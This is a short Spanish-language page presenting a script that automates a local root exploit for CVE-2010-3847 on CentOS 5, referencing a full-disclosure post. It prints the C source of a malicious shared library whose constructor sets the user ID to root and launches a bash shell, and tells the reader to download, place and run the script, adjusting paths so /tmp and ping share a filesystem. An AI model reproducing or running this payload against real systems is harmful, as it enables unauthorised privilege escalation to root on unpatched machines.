
Script para explotar CVE-2010-3847
Diseñado para automatizar el exploit comentado en [http://marc.info/?l=full-disclosure&m=128776663124692&w=2]. Probado en CentOS 5 x86.
El DSO que genera se compila a partir del siguiente código:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
Descárgalo, colócalo en algún lugar ejecutable y ejecútalo.
/tmp y dondequiera que esté ping deben estar en el mismo sistema de archivos. Si no es así,
ajusta las rutas en consecuencia.